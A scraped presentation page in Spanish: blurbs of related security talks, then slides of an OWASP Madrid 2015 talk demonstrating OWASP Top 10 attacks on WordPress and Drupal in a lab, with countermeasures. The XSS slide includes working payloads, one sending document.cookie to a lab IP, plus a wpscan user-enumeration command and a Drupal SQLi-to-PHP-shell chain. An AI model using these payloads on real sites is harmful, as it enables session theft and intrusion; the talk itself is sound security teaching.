Este documento describe diferentes tipos de ataques a aplicaciones web, incluyendo inyección de scripts, inyección de código, ataques de Path Transversal e inyección de archivos. Explica Cross Site Scripting (XSS) y cómo puede usarse para engañar a usuarios o realizar acciones no deseadas suplantando su identidad. También analiza casos reales como el ataque a Zone-H y el gusano Samy que infectó más de un millón de perfiles en MySpace, demostrando que XSS puede comprometer la seguridad de un sitio web.
OWASP es una organización sin fines de lucro dedicada a mejorar la seguridad de las aplicaciones web. Publica proyectos como la lista Top 10 de vulnerabilidades más críticas, la herramienta ZAP para pruebas de penetración, y hojas de trucos sobre temas de seguridad. Examina vulnerabilidades comunes como inyecciones, autenticación débil, exposición de datos, y uso de componentes desactualizados. Recomienda validación de entrada, encriptación, autenticación multifactor, y actualizaciones de software para prevenir ataques.
Mitigando Eventualidades de Seguridad en Web 2.0 + SemánticaSoftware Guru
En esta sesión de Lunch and Learn se revisaran ejemplos de vulnerabilidades web 2.0 + Semántica y como solucionarlas en base a un Proceso de Ingeniería de software orientada a metodologías [agiles – Samm] para grupos de trabajo que desarrollan en plataforma web [OpenSource] con seguridad informática [OWASP Ethical Hacker].
Este documento presenta el Samurai Web Testing Framework 2.0, una distribución Linux diseñada para realizar pruebas de penetración web. Incluye más de 100 herramientas como W3af, BeEF, OWASP WebScarab y OWASP ZAP. También describe vulnerabilidades comunes en aplicaciones web como inyección SQL, Cross-Site Scripting y Cross-Site Request Forgery, y cómo estas pueden ser explotadas. Finalmente, el autor ofrece realizar demostraciones prácticas de estas técnicas.
Argentesting 2017 - Proyecto OWASP Top 10Argentesting
Proyecto Top 10 de OWASP
La charla hace un pequeño recorrido sobre la evolución de la Web, la Seguridad informática dentro de la Web y el proyecto OWASP para luego desembocar en el OWASP Top Ten y ahí nos detenemos.
Desde ahí en adelante nos centralizamos en los 10 riesgos de seguridad más importantes en aplicaciones web.
Se va a explicar una por una su descripción, funcionamiento, su impacto y qué medidas tomar para prevenirlo.
A parte de todo eso se mostrará en vivo algunas de ellas para poder ver y darse cuenta cuando un sitio es vulnerable.
La prueba se hará mediante una máquina virtual levantando una web vulnerable preparada por OWASP para practicar este tipo de testing.
Terminando con recomendaciones y links para consultar todo lo dado.
Expositor: Juan Pablo Soto
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
Este documento presenta un webinar gratuito sobre vulnerabilidades en aplicaciones web dictado por Alonso Eduardo Caballero Quezada. Brevemente describe al orador, sus credenciales y experiencia. Luego resume las vulnerabilidades más comunes en aplicaciones web como Cross-Site Scripting, SQL Injection y Cross Site Request Forgery según el proyecto OWASP. Finalmente, anuncia demostraciones prácticas y un curso online sobre hacking de aplicaciones web.
Este documento explica tres tipos de vulnerabilidades de Cross Site Scripting (XSS): Tipo-0, que permite ejecutar código remotamente con los permisos del usuario; Tipo-1, un ataque no persistente o reflejado que ocurre en páginas dinámicas; y Tipo-2, un ataque persistente que inyecta código en páginas estáticas. El documento también proporciona ejemplos detallados de cómo funcionan estos ataques.
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...mauromaulinir
Curso especializado de seguridad para aplicaciones web y aplicacione móviles, de e-Securing C.A. Dictado por Mauro Maulini R. - Toda la información que los desarrolladores, programadores y expertos en seguridad de sistemas informáticos deben conocer para prevenir que sus aplicaciones web o móviles sean vulneradas, y los costos directos u ocultos que de ello deriva.
Este documento describe diferentes tipos de ataques a aplicaciones web, incluyendo inyección de scripts, inyección de código, ataques de Path Transversal e inyección de archivos. Explica Cross Site Scripting (XSS) y cómo puede usarse para engañar a usuarios o realizar acciones no deseadas suplantando su identidad. También analiza casos reales como el ataque a Zone-H y el gusano Samy que infectó más de un millón de perfiles en MySpace, demostrando que XSS puede comprometer la seguridad de un sitio web.
OWASP es una organización sin fines de lucro dedicada a mejorar la seguridad de las aplicaciones web. Publica proyectos como la lista Top 10 de vulnerabilidades más críticas, la herramienta ZAP para pruebas de penetración, y hojas de trucos sobre temas de seguridad. Examina vulnerabilidades comunes como inyecciones, autenticación débil, exposición de datos, y uso de componentes desactualizados. Recomienda validación de entrada, encriptación, autenticación multifactor, y actualizaciones de software para prevenir ataques.
Mitigando Eventualidades de Seguridad en Web 2.0 + SemánticaSoftware Guru
En esta sesión de Lunch and Learn se revisaran ejemplos de vulnerabilidades web 2.0 + Semántica y como solucionarlas en base a un Proceso de Ingeniería de software orientada a metodologías [agiles – Samm] para grupos de trabajo que desarrollan en plataforma web [OpenSource] con seguridad informática [OWASP Ethical Hacker].
Este documento presenta el Samurai Web Testing Framework 2.0, una distribución Linux diseñada para realizar pruebas de penetración web. Incluye más de 100 herramientas como W3af, BeEF, OWASP WebScarab y OWASP ZAP. También describe vulnerabilidades comunes en aplicaciones web como inyección SQL, Cross-Site Scripting y Cross-Site Request Forgery, y cómo estas pueden ser explotadas. Finalmente, el autor ofrece realizar demostraciones prácticas de estas técnicas.
Argentesting 2017 - Proyecto OWASP Top 10Argentesting
Proyecto Top 10 de OWASP
La charla hace un pequeño recorrido sobre la evolución de la Web, la Seguridad informática dentro de la Web y el proyecto OWASP para luego desembocar en el OWASP Top Ten y ahí nos detenemos.
Desde ahí en adelante nos centralizamos en los 10 riesgos de seguridad más importantes en aplicaciones web.
Se va a explicar una por una su descripción, funcionamiento, su impacto y qué medidas tomar para prevenirlo.
A parte de todo eso se mostrará en vivo algunas de ellas para poder ver y darse cuenta cuando un sitio es vulnerable.
La prueba se hará mediante una máquina virtual levantando una web vulnerable preparada por OWASP para practicar este tipo de testing.
Terminando con recomendaciones y links para consultar todo lo dado.
Expositor: Juan Pablo Soto
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
Este documento presenta un webinar gratuito sobre vulnerabilidades en aplicaciones web dictado por Alonso Eduardo Caballero Quezada. Brevemente describe al orador, sus credenciales y experiencia. Luego resume las vulnerabilidades más comunes en aplicaciones web como Cross-Site Scripting, SQL Injection y Cross Site Request Forgery según el proyecto OWASP. Finalmente, anuncia demostraciones prácticas y un curso online sobre hacking de aplicaciones web.
Este documento explica tres tipos de vulnerabilidades de Cross Site Scripting (XSS): Tipo-0, que permite ejecutar código remotamente con los permisos del usuario; Tipo-1, un ataque no persistente o reflejado que ocurre en páginas dinámicas; y Tipo-2, un ataque persistente que inyecta código en páginas estáticas. El documento también proporciona ejemplos detallados de cómo funcionan estos ataques.
Resumen curso de seguridad para desarrolladores de aplicaciones web y móviles...mauromaulinir
Curso especializado de seguridad para aplicaciones web y aplicacione móviles, de e-Securing C.A. Dictado por Mauro Maulini R. - Toda la información que los desarrolladores, programadores y expertos en seguridad de sistemas informáticos deben conocer para prevenir que sus aplicaciones web o móviles sean vulneradas, y los costos directos u ocultos que de ello deriva.
Open Web Application Security Project Top 10: OWASP con el fin de canalizar los esfuerzos en la seguridad de aplicaciones y APIs, llevó adelante un relevamiento global y colaborativo con los 10 riesgos de seguridad más críticos de la web, conocido como OWASP TOP 10.
Este documento habla sobre la seguridad web con software libre. Explica aspectos básicos como vulnerabilidades comunes como XSS e inyección SQL. También cubre herramientas de software libre como OWASP y Wapiti para auditorías de seguridad. Finalmente, ofrece consejos como mantener actualizaciones, cambiar contraseñas regularmente, y realizar pruebas de penetración periódicas.
Las Aplicaciones Web actualmente son utilizadas en los más diversos ámbitos, desde realizar una búsqueda en Google, revisar una red social como Facebook, comprar en Internet, o ingresar hacia servicios en linea proporcionados por las organizaciones o empresas. Sencillamente es todo aquello fundamentalmente relacionado con el protocolo HTTP/S. Este Webinar expone ejemplos prácticos sobre como explotar las vulnerabilidades más comunes en aplicaciones web (SQLi, XSS, CSRF).
Webinar Gratuito: Escaneos con Scripts de Nmap para Hacking WebAlonso Caballero
NSE es una de las funcionalidades más potentes y flexibles de Nmap. Permite a los usuarios escribir scripts simples para automatizar una amplia variedad de tareas para redes. Estos scripts se ejecutan en paralelo con la velocidad y eficiencia conocida de Nmap. Los usuarios confían en el creciente y diverso conjunto de scripts distribuidos con Nmap, o también pueden escribir los propios para satisfacer necesidades específicas. En este webinar se expone; utilizando ejemplos y demostraciones prácticas; diversos scripts (NSE) factibles de ser utilizados para Hacking Web.
La seguridad de las aplicaciones web se centra en proteger sitios web, aplicaciones web y servicios web. Los ataques más comunes incluyen inyección SQL, cross-site scripting (XSS) y phishing, los cuales se aprovechan de errores de codificación y falta de sanitización de datos de entrada y salida. Una adecuada seguridad de aplicaciones web requiere prevenir estas vulnerabilidades.
El documento habla sobre vulnerabilidades en software, tipos de ataques como inyección SQL e XSS, y herramientas para pruebas de seguridad como Vega y sqlmap. Explica que las vulnerabilidades son puntos débiles que permiten comprometer la integridad, disponibilidad o confidencialidad de un software, y que algunos ataques se basan en no verificar adecuadamente los valores introducidos por el usuario o confiar demasiado en los datos del cliente.
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
Este webinar expone detalladamente el procedimiento de como utilizando la distribución Kali Linux, orientada a realizar pruebas de penetración y auditorías de seguridad; y puntualmente la herramienta OWASP Zed Attack Proxy (ZAP), es factible encontrar automáticamente vulnerabilidades de seguridad en las aplicaciones web, mientras se desarrollan y prueban las aplicaciones.
Introducción al OWASP Top 10 - Los diez riesgos mas importantes en aplicaciones web
- Es un documento EDUCATIVO.
- Es GRATUITO.
- DESCRIBE los riesgos más críticos en aplicaciones Web
Para cada riesgo, aporta:
- Descripción del mismo
- Escenario de ejemplo de un ataque
- Pautas para verificar si nuestra aplicación es vulnerable
- Recomendaciones para prevenir dicho riesgo
Seguridad 003 tipologías de ataques webLuis Fernando
El documento presenta una introducción a las tipologías de ataques web. Explica brevemente diferentes tipos de ataques como ataques a la autenticación, autorización, en la parte del cliente, de ejecución de comandos y revelación de información. También presenta una clasificación de los 10 principales riesgos de seguridad en la web de OWASP y métodos para prevenir y mitigar cada riesgo.
Este documento describe cómo el autor descubrió vulnerabilidades como HTML Injection y XSS en un organismo público a través de pruebas de penetración. El autor proporciona detalles sobre cómo aprovechó estas vulnerabilidades y recomienda medidas como validar la entrada de usuarios y seguir prácticas de desarrollo seguro para prevenir este tipo de ataques en el futuro. Finalmente, el organismo pudo corregir la vulnerabilidad siguiendo las recomendaciones.
El documento describe dos de las principales amenazas a las bases de datos: malware y inyección SQL. El malware, como virus y gusanos, puede dañar sistemas e infectar bases de datos. La inyección SQL es cuando código malicioso se inserta en consultas SQL para acceder una base de datos. Para mitigar estos riesgos, se deben mantener sistemas actualizados, usar herramientas antivirus, y verificar datos de usuarios en consultas SQL.
El documento habla sobre las vulnerabilidades más comunes en aplicaciones web como la inyección SQL, el cross-site scripting y el abuso de funcionalidades. Explica cada vulnerabilidad con ejemplos y cómo prevenirlas validando todas las entradas del usuario y escapando datos antes de almacenarlos o mostrarlos para evitar inyecciones de código malicioso.
El documento describe dos amenazas principales a las bases de datos: malware y inyección SQL. Para combatir malware, se recomienda mantener los sistemas actualizados y usar herramientas de eliminación. Para inyección SQL, se sugiere analizar el código con herramientas de prueba y aplicar controles como escapar caracteres especiales y verificar datos de usuarios.
Este documento describe varias técnicas de ataque XSS utilizando JavaScript, comenzando con ejemplos básicos como mostrar alertas y redireccionar la página, y progresando a técnicas más avanzadas como robar cookies, capturar datos de formularios, y tomar control del DOM. El objetivo es presentar una amplia gama de posibilidades ofensivas a través de inyección de código en páginas web vulnerables.
Este documento habla sobre seguridad en aplicaciones Node.js. Explica qué es OWASP y su Top 10, que lista las 10 vulnerabilidades más comunes en aplicaciones web. También cubre JWT y JWK, estándares para transmitir información de forma segura entre aplicaciones. Finalmente, incluye una implementación de JWT y JWKS en Node.js para practicar estos conceptos de seguridad.
1. OWASP es una comunidad abierta dedicada a mejorar la seguridad de aplicaciones web. Publica listas de vulnerabilidades comunes como la OWASP Top 10 y herramientas gratuitas como ZAP.
2. Algunas vulnerabilidades comunes incluyen configuraciones débiles, comunicaciones no encriptadas, y software desactualizado.
3. OWASP recomienda pruebas como la recopilación de información, pruebas de configuración, autenticación, autorización, validación de datos y denegación de servicio.
Este documento presenta una introducción a la ciberseguridad y seguridad de aplicaciones. Explica conceptos como vulnerabilidades, explotaciones e impacto, y analiza amenazas comunes como inyección SQL, cross-site scripting y path traversal. También introduce herramientas de hacking ético y análisis forense como OWASP ZAP, SQLMap y Kali Linux.
El documento presenta el Top 10 de riesgos de seguridad más importantes en aplicaciones web según la Open Web Application Security Project (OWASP). Explica brevemente cada uno de los 10 riesgos, que incluyen inyección, autenticación y sesiones rotas, cross-site scripting, control de acceso roto, configuración errónea de seguridad, exposición de datos sensibles, protección insuficiente contra ataques, cross-site request forgery, uso de componentes con vulnerabilidades conocidas y APIs sin protección.
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
El documento describe la seguridad en servidores web, incluyendo ataques comunes como inyección SQL y cross-site scripting. También presenta herramientas para la detección y protección como escáneres web y el módulo Apache mod_security, el cual actúa como un cortafuegos de aplicaciones para filtrar tráfico HTTP de forma transparente usando reglas basadas en expresiones regulares.
para programadores y desarrolladores de inteligencia artificial y machine learning, como se automatiza una cadena de valor o cadena de valor gracias a la teoría por Manuel Diaz @manuelmakemoney
Más contenido relacionado
Similar a From vulnerable source to shell in two hours
Open Web Application Security Project Top 10: OWASP con el fin de canalizar los esfuerzos en la seguridad de aplicaciones y APIs, llevó adelante un relevamiento global y colaborativo con los 10 riesgos de seguridad más críticos de la web, conocido como OWASP TOP 10.
Este documento habla sobre la seguridad web con software libre. Explica aspectos básicos como vulnerabilidades comunes como XSS e inyección SQL. También cubre herramientas de software libre como OWASP y Wapiti para auditorías de seguridad. Finalmente, ofrece consejos como mantener actualizaciones, cambiar contraseñas regularmente, y realizar pruebas de penetración periódicas.
Las Aplicaciones Web actualmente son utilizadas en los más diversos ámbitos, desde realizar una búsqueda en Google, revisar una red social como Facebook, comprar en Internet, o ingresar hacia servicios en linea proporcionados por las organizaciones o empresas. Sencillamente es todo aquello fundamentalmente relacionado con el protocolo HTTP/S. Este Webinar expone ejemplos prácticos sobre como explotar las vulnerabilidades más comunes en aplicaciones web (SQLi, XSS, CSRF).
Webinar Gratuito: Escaneos con Scripts de Nmap para Hacking WebAlonso Caballero
NSE es una de las funcionalidades más potentes y flexibles de Nmap. Permite a los usuarios escribir scripts simples para automatizar una amplia variedad de tareas para redes. Estos scripts se ejecutan en paralelo con la velocidad y eficiencia conocida de Nmap. Los usuarios confían en el creciente y diverso conjunto de scripts distribuidos con Nmap, o también pueden escribir los propios para satisfacer necesidades específicas. En este webinar se expone; utilizando ejemplos y demostraciones prácticas; diversos scripts (NSE) factibles de ser utilizados para Hacking Web.
La seguridad de las aplicaciones web se centra en proteger sitios web, aplicaciones web y servicios web. Los ataques más comunes incluyen inyección SQL, cross-site scripting (XSS) y phishing, los cuales se aprovechan de errores de codificación y falta de sanitización de datos de entrada y salida. Una adecuada seguridad de aplicaciones web requiere prevenir estas vulnerabilidades.
El documento habla sobre vulnerabilidades en software, tipos de ataques como inyección SQL e XSS, y herramientas para pruebas de seguridad como Vega y sqlmap. Explica que las vulnerabilidades son puntos débiles que permiten comprometer la integridad, disponibilidad o confidencialidad de un software, y que algunos ataques se basan en no verificar adecuadamente los valores introducidos por el usuario o confiar demasiado en los datos del cliente.
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
Este webinar expone detalladamente el procedimiento de como utilizando la distribución Kali Linux, orientada a realizar pruebas de penetración y auditorías de seguridad; y puntualmente la herramienta OWASP Zed Attack Proxy (ZAP), es factible encontrar automáticamente vulnerabilidades de seguridad en las aplicaciones web, mientras se desarrollan y prueban las aplicaciones.
Introducción al OWASP Top 10 - Los diez riesgos mas importantes en aplicaciones web
- Es un documento EDUCATIVO.
- Es GRATUITO.
- DESCRIBE los riesgos más críticos en aplicaciones Web
Para cada riesgo, aporta:
- Descripción del mismo
- Escenario de ejemplo de un ataque
- Pautas para verificar si nuestra aplicación es vulnerable
- Recomendaciones para prevenir dicho riesgo
Seguridad 003 tipologías de ataques webLuis Fernando
El documento presenta una introducción a las tipologías de ataques web. Explica brevemente diferentes tipos de ataques como ataques a la autenticación, autorización, en la parte del cliente, de ejecución de comandos y revelación de información. También presenta una clasificación de los 10 principales riesgos de seguridad en la web de OWASP y métodos para prevenir y mitigar cada riesgo.
Este documento describe cómo el autor descubrió vulnerabilidades como HTML Injection y XSS en un organismo público a través de pruebas de penetración. El autor proporciona detalles sobre cómo aprovechó estas vulnerabilidades y recomienda medidas como validar la entrada de usuarios y seguir prácticas de desarrollo seguro para prevenir este tipo de ataques en el futuro. Finalmente, el organismo pudo corregir la vulnerabilidad siguiendo las recomendaciones.
El documento describe dos de las principales amenazas a las bases de datos: malware y inyección SQL. El malware, como virus y gusanos, puede dañar sistemas e infectar bases de datos. La inyección SQL es cuando código malicioso se inserta en consultas SQL para acceder una base de datos. Para mitigar estos riesgos, se deben mantener sistemas actualizados, usar herramientas antivirus, y verificar datos de usuarios en consultas SQL.
El documento habla sobre las vulnerabilidades más comunes en aplicaciones web como la inyección SQL, el cross-site scripting y el abuso de funcionalidades. Explica cada vulnerabilidad con ejemplos y cómo prevenirlas validando todas las entradas del usuario y escapando datos antes de almacenarlos o mostrarlos para evitar inyecciones de código malicioso.
El documento describe dos amenazas principales a las bases de datos: malware y inyección SQL. Para combatir malware, se recomienda mantener los sistemas actualizados y usar herramientas de eliminación. Para inyección SQL, se sugiere analizar el código con herramientas de prueba y aplicar controles como escapar caracteres especiales y verificar datos de usuarios.
Este documento describe varias técnicas de ataque XSS utilizando JavaScript, comenzando con ejemplos básicos como mostrar alertas y redireccionar la página, y progresando a técnicas más avanzadas como robar cookies, capturar datos de formularios, y tomar control del DOM. El objetivo es presentar una amplia gama de posibilidades ofensivas a través de inyección de código en páginas web vulnerables.
Este documento habla sobre seguridad en aplicaciones Node.js. Explica qué es OWASP y su Top 10, que lista las 10 vulnerabilidades más comunes en aplicaciones web. También cubre JWT y JWK, estándares para transmitir información de forma segura entre aplicaciones. Finalmente, incluye una implementación de JWT y JWKS en Node.js para practicar estos conceptos de seguridad.
1. OWASP es una comunidad abierta dedicada a mejorar la seguridad de aplicaciones web. Publica listas de vulnerabilidades comunes como la OWASP Top 10 y herramientas gratuitas como ZAP.
2. Algunas vulnerabilidades comunes incluyen configuraciones débiles, comunicaciones no encriptadas, y software desactualizado.
3. OWASP recomienda pruebas como la recopilación de información, pruebas de configuración, autenticación, autorización, validación de datos y denegación de servicio.
Este documento presenta una introducción a la ciberseguridad y seguridad de aplicaciones. Explica conceptos como vulnerabilidades, explotaciones e impacto, y analiza amenazas comunes como inyección SQL, cross-site scripting y path traversal. También introduce herramientas de hacking ético y análisis forense como OWASP ZAP, SQLMap y Kali Linux.
El documento presenta el Top 10 de riesgos de seguridad más importantes en aplicaciones web según la Open Web Application Security Project (OWASP). Explica brevemente cada uno de los 10 riesgos, que incluyen inyección, autenticación y sesiones rotas, cross-site scripting, control de acceso roto, configuración errónea de seguridad, exposición de datos sensibles, protección insuficiente contra ataques, cross-site request forgery, uso de componentes con vulnerabilidades conocidas y APIs sin protección.
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
El documento describe la seguridad en servidores web, incluyendo ataques comunes como inyección SQL y cross-site scripting. También presenta herramientas para la detección y protección como escáneres web y el módulo Apache mod_security, el cual actúa como un cortafuegos de aplicaciones para filtrar tráfico HTTP de forma transparente usando reglas basadas en expresiones regulares.
Similar a From vulnerable source to shell in two hours (20)
para programadores y desarrolladores de inteligencia artificial y machine learning, como se automatiza una cadena de valor o cadena de valor gracias a la teoría por Manuel Diaz @manuelmakemoney
Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)AbrahamCastillo42
Power point, diseñado por estudiantes de ciclo 1 arquitectura de plataformas, esta con la finalidad de dar a conocer el componente hardware llamado tarjeta de video..
La inteligencia artificial sigue evolucionando rápidamente, prometiendo transformar múltiples aspectos de la sociedad mientras plantea importantes cuestiones que requieren una cuidadosa consideración y regulación.
5. Quienes Somos?
Angel Garcia (@_Ell0_)
- Auditor de Seguridad
¿hacker?
- Miembro de un TigerTeam
- blog.sec-root.com
- Padre (con eso lo digo
todo)
Dani Martínez (@dan1t0)
- Auditor de Seguridad ¿hacker?
- Miembro de un TigerTeam
- CamisetasFrikis.es
- Juego al Rugby
- Me gusta aportar
- Blog abandonado
5OWASP Madrid Chapter - Marzo 2015
6. Índice
La charla tendrá un enfoque práctico tipo:
Problema --> Ataque
- A9 Uso de software (componentes) vulnerables
- A8 Cross-Site Request Forgery (CSRF)
- A3 Cross-Site-Scripting (XSS)
- A2 Ataque a la autenticación y Manejo de Sesión
- A1 Inyección SQL
6OWASP Madrid Chapter - Marzo 2015
7. 7OWASP Madrid Chapter - Marzo 2015
Enfoque
Se analizarán distintas vulnerabilidades
encuadradas en el TOP 10 de OWASP
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
! A1 Injection
! A2 Broken Authentication and Session Management
! A3 Cross-Site Scripting (XSS)
! A4 Insecure Direct Object References
! A5 Security Misconfiguration
! A6 Sensitive Data Exposure
! A7 Missing Function Level Access Control
! A8 Cross-Site Request Forgery (CSRF)
! A9 Using Components with Known Vulnerabilities
! A10 Unvalidated Redirects and Forwards
8. 8OWASP Madrid Chapter - Marzo 2015
A9 – Using Components with Known
Vulnerabilities
! Uno de los principales vectores de intrusión es el
empleo de ataques o exploits públicos contra
vulnerabilidades conocidas (y algunas de ellas MUY
CONOCIDAS)
! Los sistemas y aplicaciones desfasados son claras
víctimas tanto de ataques dirigidos como de ataques
masivos.
! Google, Shodan y otros motores de búsqueda son tus
amigos };-)
9. 9OWASP Madrid Chapter - Marzo 2015
A9 – Using Components with Known
Vulnerabilities
Worpress tiene alguna vulnerabilidad ¿no?
10. 10OWASP Madrid Chapter - Marzo 2015
A9 – Using Components with Known
Vulnerabilities
Entonces todo el mundo tendrá su Wordpress
actualizado… ¿o no?
11. 11OWASP Madrid Chapter - Marzo 2015
A9 – Using Components with Known
Vulnerabilities
Más trucos sexys: http://www.exploit-db.com/google-dorks/
12. 12OWASP Madrid Chapter - Marzo 2015
A8 – Cross-Site Request Forgery (CSRF)
“El CSRF (del inglés Cross-site request forgery o falsificación
de petición en sitios cruzados) es un tipo de exploit malicioso
de un sitio web en el que comandos no autorizados son
transmitidos por un usuario en el cual el sitio web
confía. Esta vulnerabilidad es conocida también por otros
nombres como XSRF, enlace hostil, ataque de un click,
cabalgamiento de sesión, y ataque automático.
Un ataque CSRF fuerza al navegador web validado de una
víctima a enviar una petición a una aplicación web
vulnerable, la cual entonces realiza la acción elegida a través
de la víctima. Al contrario que en los ataques XSS, los cuales
explotan la confianza que un usuario tiene en un sitio en
particular, el cross site request forgery explota la confianza
que un sitio tiene en un usuario en particular.”
18. 18OWASP Madrid Chapter - Marzo 2015
A8 – Cross-Site Request Forgery (CSRF)
La contramedida general es mediante el uso de tokens de
sesión aleatorios, que sean enviados en la petición HTTP.
En el caso de Wordpress:
19. 19OWASP Madrid Chapter - Marzo 2015
A3 – Cross-Site Scripting(XSS)
“XSS, del inglés Cross-site scripting es un tipo de
inseguridad informática o agujero de seguridad típico de las
aplicaciones Web, que permite a una tercera parte inyectar
en páginas web visitadas por el usuario código
JavaScript o en otro lenguaje script similar (ej:
VBScript), evitando medidas de control como la Política del
mismo origen. (…)
XSS es un vector de ataque que puede ser utilizado para
robar información delicada, secuestrar sesiones de
usuario, y comprometer el navegador, subyugando la
integridad del sistema. (…)”
24. 24OWASP Madrid Chapter - Marzo 2015
A3 – Cross-Site Scripting(XSS)
Podemos esforzarnos más y hacer algo más divertido:
! Redirigir a un sitio malicioso
! Preparar un phishing
! Inyectar un iFrame con malware
! Robar una sesión autenticada
! Ejecutar JavaScript en la maquina victima
" Minamos unos BitCoins???
" Realizamos un DoS a una web???
" Explotar un CSRF!!!
25. 25OWASP Madrid Chapter - Marzo 2015
A3 – Cross-Site Scripting(XSS)
! XSS
[<blockquote cite="]">["
onmouseover="this.style.display='none';alert('exploit javascript
running');" style="position:fixed;left:0px;top:0px;width:
100%;height:100%;z-index:10000;display:block" ]
! Go to a webside!
[<blockquote cite="]">["
onmouseover="this.style.display='none';window.location='http://
172.16.155.145/hacker/index.html';" style="position:fixed;left:
0px;top:0px;width:100%;height:100%;z-index:10000;display:block" ]
! Steal Cookie
[<blockquote cite="]">["
onmouseover="this.style.display='none';xmlhttp=new
XMLHttpRequest();xmlhttp.open('GET','http://
172.16.155.145/'+document.cookie,true);xmlhttp.send();"
style="position:fixed;left:0px;top:0px;width:100%;height:100%;z-
index:10000;display:block" ]
27. 27OWASP Madrid Chapter - Marzo 2015
A3 – Cross-Site Scripting(XSS)
Contramedidas:
" Filtrar caracteres potencialmente peligrosos como “<” “>” “;”
“/” “”
" Establecer medidas de filtrado:
§ Lado cliente (ej javascript).
§ Lado servidor (ej ignorando la petición o devolviendo error).
" Codificar la salida de datos.
28. 28OWASP Madrid Chapter - Marzo 2015
A2 – Broken Authentication and Session
Management
“Las funciones de la aplicación relacionadas a autenticación y
gestión de sesiones son frecuentemente implementadas
incorrectamente, permitiendo a los atacantes comprometer
contraseñas, claves, token de sesiones, o explotar otras fallas
de implementación para asumir la identidad de otros
usuarios.”
30. 30OWASP Madrid Chapter - Marzo 2015
A2 – Broken Authentication and Session
Management
Para explotar la vulnerabilidad lo primero que haremos
será listar los usuarios existentes en el wordpress
vulnerable:
wpscan --url 172.16.155.145/wordpress --enumerate u
31. 31OWASP Madrid Chapter - Marzo 2015
A2 – Broken Authentication and Session
Management
! Según el advisory:
" Se necesita crear una contraseña muy larga.
" Conocer un usuario legitimo.
" Mandar repetidas peticiones.
32. A2 – Broken Authentication and Session
Management
! Antes
! Después
32OWASP Madrid Chapter - Marzo 2015
34. 34OWASP Madrid Chapter - Marzo 2015
A2 – Broken Authentication and Session
Management
El control de este tipo de vulnerabilidades normalmente abarca
diversos puntos de control que pueden implicar varios puntos de la
infraestructura. Aunque las contramedidas deberían adecuarse a cada
caso, algunos ejemplos de éstas serían los siguientes:
ü Envío de credenciales o datos de autenticación siempre por canales
cifrados
ü Creación de políticas de complejidad y cambio de contraseñas
ü Control de intentos de autenticación, bloqueo y desbloqueo de
usuarios
ü Varios factores de autenticación, especialmente para tareas críticas
ü Medidas efectivas para evitar saltos horizontales y verticales de
privilegios
35. 35OWASP Madrid Chapter - Marzo 2015
A1 – Injection (SQL injection)
“Inyección SQL es un método de infiltración de código
intruso que se vale de una vulnerabilidad informática
presente en una aplicación en el nivel de validación de las
entradas para realizar operaciones sobre una base de
datos.
El origen de la vulnerabilidad radica en el incorrecto
chequeo y/o filtrado de las variables utilizadas en un
programa que contiene, o bien genera, código SQL. Es, de
hecho, un error de una clase más general de vulnerabilidades
que puede ocurrir en cualquier lenguaje de programación o
script que esté embebido dentro de otro.
Se conoce como Inyección SQL, indistintamente, al tipo de
vulnerabilidad, al método de infiltración, al hecho de incrustar
código SQL intruso y a la porción de código incrustado.”
37. 37OWASP Madrid Chapter - Marzo 2015
A1 – Injection (SQL injection)
Podemos hacer la prueba a mano con burp
38. 38OWASP Madrid Chapter - Marzo 2015
A1 – Injection (SQL injection)
Explotemos un Blind SQL Injection a mano!!
39. 39OWASP Madrid Chapter - Marzo 2015
A1 – Injection (SQL injection)
Explotemos un Blind SQL Injection a mano!!
40. 40OWASP Madrid Chapter - Marzo 2015
A1 – Injection (SQL injection)
! Usaremos de nuevo por comodidad metasploit
! Las fases de la explotación serán las siguientes:
" Aprovechando el SQLi se crea un usuario en Drupal
" El usuario crea un “artículo” con un payload en php.
" Ejecutamos stage que nos apetezca:
43. 43OWASP Madrid Chapter - Marzo 2015
A1 – Injection (SQL injection)
! El exploit “in the wild”
" Se crea un usuario en la BBDD
" Se instala una theme con una shell en php
" Se ejecuta de forma masiva
" Proffit
§ Botnets
§ Robo de datos
§ Hacking masivo…
http://www.securitysift.com/drupal-7-sqli/
45. 45OWASP Madrid Chapter - Marzo 2015
A1 – Injection (SQL injection)
La contramedida general es mediante el uso de prepared
statements o sentencias parametrizadas … correctamente
empleadas.
En el caso de Drupal:
protected function expandArguments(&$query, &$args) {
$modified = FALSE;
foreach (array_filter($args, 'is_array') as $key => $data) {
$new_keys = array();
foreach ($data as $i => $value) {
foreach (array_values($data) as $i => $value) {
$new_keys[$key . '_' . $i] = $value;
}
…
46. 46OWASP Madrid Chapter - Marzo 2015
Gracias
Preguntas?
Para más información:
https://www.owasp.org/index.php/Madrid